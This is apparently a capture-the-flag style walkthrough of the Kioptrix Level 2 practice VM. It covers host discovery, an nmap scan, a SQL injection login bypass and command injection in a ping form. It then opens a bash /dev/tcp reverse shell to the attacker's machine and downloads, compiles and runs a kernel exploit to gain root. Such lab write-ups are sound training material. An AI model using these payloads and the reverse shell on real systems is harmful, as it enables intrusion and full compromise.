Kioptrix 2 VM can be downloaded here.
0. Get VMs IP
root@kali:~# netdiscover -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
260 Captured ARP Req/Rep packets, from 4 hosts. Total size: 15600
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.67 c4:e9:84:10:d3:5e 255 15300 TP-LINK TECHNOLOGIES CO.,LTD.
**...**
1. Enumeration
1.1 TCP Ports enumeration
root@kali:~# nmap 192.168.1.67 -sV
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-15 00:30 EST
Nmap scan report for 192.168.1.67
Host is up (0.000049s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp open ipp CUPS 1.1
3306/tcp open mysql MySQL (unauthorized)
MAC Address: C4:E9:84:10:D3:5E (Tp-link Technologies)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.64 seconds
Hmm, some interesting services we see running on the machine. Most of these are pretty old. I did a quick search for existing exploits and didn’t find any. It’s still very possible that other vulnerabilities exist, yet I decided to check the web server running first.
Note: I didn’t do a full TCP scan as it was taking way too long. Running it in
the background after the initial scan is might be useful.
2. Web server
2.1 Login form
Remote System Administration Login | |
Username | |
Password | |
Hitting http://192.168.1.67
shows us a login form, possibly vulnerable to SQL injection. I tried the vanilla admin' or 1=1 #
and it worked!
Why did it work? Possibly because the query is in this form:
SELECT * from users where username="$_REQUEST["username"]" and password="$_REQUEST["password"]"
After submitting admin" or 1=1 #
, it’s evaluated to:
SELECT * from users where username="admin" or 1=1 # //ignored
which logs us in as admin.
2.2 Admin interface
This looks very vulnerable to an RCE (Remote Code Injection) attack. Let’s try appending commands to it.
- Input: 127.0.0.1
Output:PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.010 ms 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.012 ms 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.012 ms --- 127.0.0.1 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 1998ms rtt min/avg/max/mdev = 0.010/0.011/0.012/0.003 ms, pipe 2
- Input: 127.0.0.1; whoami
Output:PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.007 ms 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.012 ms 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.013 ms --- 127.0.0.1 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 1999ms rtt min/avg/max/mdev = 0.007/0.010/0.013/0.004 ms, pipe 2 apache
whoami
returned apache! We’re able to execute arbitrary commands. Let’s get a shell by starting a listener on attacking machine.
root@kali:~# nc -nvlp 443
listening on [any] 443 ...
Then getting a reverse shell connected to it.
Input: 127.0.0.1; bash -i >& /dev/tcp/192.168.1.69/443 0>&1
Output on attacking machine:
root@kali:~# nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.1.69] from (UNKNOWN) [192.168.1.67] 32769
bash: no job control in this shell
bash-3.00$
Awesome! We got a shell as apache user.
3. Getting root
Basic enumeration will reveal that this CentOS version **(4.5 Final) **is vulnerable to CVE-2009-2698
Exploit can be found here.
root@kali:~# nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.1.69] from (UNKNOWN) [192.168.1.67] 32769
bash: no job control in this shell
bash-3.00$ cat /etc/issue
Welcome to Kioptrix Level 2 Penetration and Assessment Environment
--The object of this game:
|_Acquire "root" access to this machine.
There are many ways this can be done, try and find more then one way to
appreciate this exercise.
DISCLAIMER: Kioptrix is not resposible for any damage or instability
caused by running, installing or using this VM image.
Use at your own risk.
WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the outside world
(the Internet - or Interwebs..)
Good luck and have fun!
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ uname -mrs
Linux 2.6.9-55.EL i686
bash-3.00$ cat /etc/redhat-release
CentOS release 4.5 (Final)
bash-3.00$ cd /tmp
bash-3.00$ wget https://www.exploit-db.com/download/9542 --no-check-certificate
--23:08:44-- https://www.exploit-db.com/download/9542
=> `9542'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [application/txt]
0K .. 100% 210.21 MB/s
23:08:45 (210.21 MB/s) - `9542' saved [2645/2645]
bash-3.00$ ls
9542
index.html
bash-3.00$ mv 9542 a.c
bash-3.00$ gcc a.c
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00#
Quite easy and straight forward!